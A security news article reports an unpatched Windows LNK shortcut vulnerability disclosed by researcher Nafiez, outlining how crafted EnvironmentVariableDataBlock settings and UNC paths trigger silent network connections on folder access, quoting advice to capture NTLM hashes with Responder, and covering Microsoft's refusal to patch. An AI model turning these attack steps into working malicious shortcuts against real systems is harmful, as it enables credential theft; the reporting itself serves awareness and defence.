Security researcher Nafiez has brought to light a previously undisclosed vulnerability that affects Windows LNK files, commonly known as shortcuts. This flaw presents a significant risk, as it allows potential attackers to execute code remotely without requiring any interaction from the user. Despite the release of a working proof-of-concept (PoC), Microsoft has opted not to address the issue, asserting that it “does not meet their security bar for servicing.”
The vulnerability hinges on a complex attack vector that exploits specific components within the structure of Windows shortcut files. By creating malicious LNK files with altered EnvironmentVariableDataBlock and UNC paths, attackers can initiate silent network connections simply by having a user open a folder containing the compromised shortcut.
“When a user accesses a folder that contains the LNK file, Explorer will parse any files stored in that folder… this is where the initialization of the file gets ready to be called/executed,” Nafiez elaborated in his technical analysis.
This particular vulnerability raises alarms due to its nature; it does not require the user to actively click on the shortcut. Merely browsing a directory that houses the malicious LNK file is enough to trigger the attack.
PoC Details Released
The exploit operates by manipulating several critical elements within the LNK file structure:
- Setting the HasArguments flag and EnvironmentVariableDataBlock to control execution flow
- Embedding a UNC path (e.g., 192.168.44.128c) as a target
- Setting specific BlockSize and signature values to influence LNK file behavior
Windows Explorer processes these specially crafted files through a series of COM interfaces, including IInitializeNetworkFolder and IShellFolder2, which manage network resources. This processing begins automatically upon folder access, creating an opportunity for silent execution.
Microsoft has defended its decision not to patch this vulnerability by claiming that their Mark of the Web (MOTW) security feature offers sufficient protection. MOTW acts as a digital tag on downloaded files that may be harmful, triggering security warnings prior to execution.
This stance mirrors Microsoft’s response to previous LNK vulnerabilities. According to their security servicing criteria, the company addresses vulnerabilities only if they “violate the goal or intent of a security boundary or security feature” and meet their severity threshold for servicing.
“Once you compile the code, run the executable to generate the LNK file and ensure to run the Responder tool to capture NTLM Hash,” Nafiez advised.
Security experts are voicing concerns that relying solely on MOTW may not be adequate, as there are known techniques to bypass these protections. Researchers at Elastic Security Labs recently identified a method known as “LNK stomping,” which has been utilized by threat actors for at least six years to circumvent MOTW controls.
This is not the first instance of LNK files being exploited. Microsoft has previously addressed critical vulnerabilities in LNK files, including a remote code execution flaw in 2017 and another in 2010 that was actively exploited.
LNK files have increasingly become a favored attack vector for threat actors. As security researchers from Intezer observe, “LNK files (aka Windows shortcuts) may seem simple, but threat actors can use them to execute other binaries and inflict great harm.”
The availability of the proof-of-concept code amplifies concerns that this vulnerability could soon be weaponized by malicious actors in real-world scenarios.
Are you from the SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
